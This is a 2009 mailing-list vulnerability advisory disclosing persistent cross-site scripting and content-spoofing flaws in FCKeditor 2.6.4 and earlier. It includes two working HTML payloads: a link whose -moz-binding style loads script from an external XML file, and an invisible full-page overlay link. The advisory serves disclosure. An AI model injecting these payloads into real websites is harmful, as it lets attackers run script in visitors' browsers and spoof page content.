Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Mambo 4.6.3 arbitrary file upload

rubrique 'rubrique. php' SQL Injection Vulnerability

Dawaween V 1.03 <<----SQL Injection Exploit

Advisory 01/2009: Horde_Form_Type_image Arbitrary File Overwrite Vulnerability

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	22.09.2009
Subject:	XSS and Content Spoofing vulnerabilities in FCKeditor

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in FCKeditor.

XSS:

This is Persistent XSS vulnerability. Attack is conducting via placing link with setting the style.

<a href="http://test" style="-moz-binding:url('http://site/xss.
xml#xss')">test</a>

This vulnerability works in Mozilla and Firefox (before Firefox 3.0).

Content Spoofing:

This is Persistent Content Spoofing vulnerability.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:
0px;left:0px">&nbsp;</a>

These vulnerabilities are in editor itself. So they can be used at any site, which use FCKeditor as editor of web forms.

Vulnerable are FCKeditor 2.6.4 (and 2.6.4.1 must be too) and previous versions.

I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/3300/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua